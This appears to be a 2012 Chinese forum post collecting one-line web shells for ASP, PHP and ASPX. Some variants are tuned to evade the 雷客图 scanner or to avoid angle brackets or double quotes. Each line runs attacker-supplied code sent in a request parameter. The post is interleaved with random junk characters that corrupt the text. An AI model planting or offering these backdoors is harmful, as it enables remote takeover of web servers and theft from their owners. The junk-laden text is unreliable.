asp一句话 <%execute(request("1"))%>
' ^: O7 @- q% G$ L* y) } i' l. ~
. B9 r: B6 s( r0 f) ?! L& qphp一句话 <?php eval($_POST[1]);?>
K5 r) G0 U% }. M
: ]- M$ m# P2 Z) `0 H" ^aspx一句话- D6 Z4 S2 }" y1 ~0 c+ K: N
O! j P& Q5 K# P' n<script language="C#" runat="server">
2 K$ P g+ q5 [. }3 R" O6 S. D4 k3 D: t3 L: k$ T
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");
0 u+ Y5 C O) m0 h6 m; s' Z S8 h! I8 l6 |- Y- N" L8 m
</script>4 }2 G3 J/ C! E& u. z- ~% n! y
) j- ]) G3 [2 b% ]; r" }' l& \
可以躲过雷客图的一句话。
2 H! y5 j* r/ v( L* U4 m+ ]) ? P0 T. y' w+ A5 L8 I( D1 S+ }
<%
# `" b& @) c9 J- d7 I; ~, `6 Z* _: e4 x1 j* D& C4 Y
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
/ j8 i" n4 D: |. e% Z2 S5 `. ~( O7 v8 {3 [3 z& R% L! s' p4 Q
ms.Language="VBScript"5 s/ } a9 G9 J: G6 B: C" r+ o
3 o$ T! I4 J% e5 Q* v& Q
ms.AddObject "Response", Response
! G6 e" X% S( _5 Y6 d
; [5 A! ~5 N$ A& n: f/ [+ t3 s4 A ms.AddObject "request", request
/ i$ A/ A7 |. R
: M3 n& @; ]0 r W" s0 x ms.ExecuteStatement("ev"&"al(request(""1""))")% k8 \7 Y; i9 d' y' \ \
! c' |1 p- V% S7 _
%>; x7 r3 A% ^0 {3 W4 }, ~
' m$ Q7 Z+ h- Z4 ^ 不用'<,>'的asp一句话8 [; l# S' I" o
7 \4 f* g K* K/ T! A9 m <script language=VBScript runat=server>execute request("1")</script>! }7 |9 b' Q' f# {
) k5 d6 o6 H9 K2 W' o' o) k
不用双引号的一句话。
! p" l O$ B; E, h7 J- a2 F/ B5 v ~0 [- ?9 `$ w8 ^$ A
<%eval request(chr(35))%>! u2 w4 E3 {" Q, }, H6 C5 M7 s+ G" }
|
发表于 2012-9-23 14:36:09
收藏
支持
反对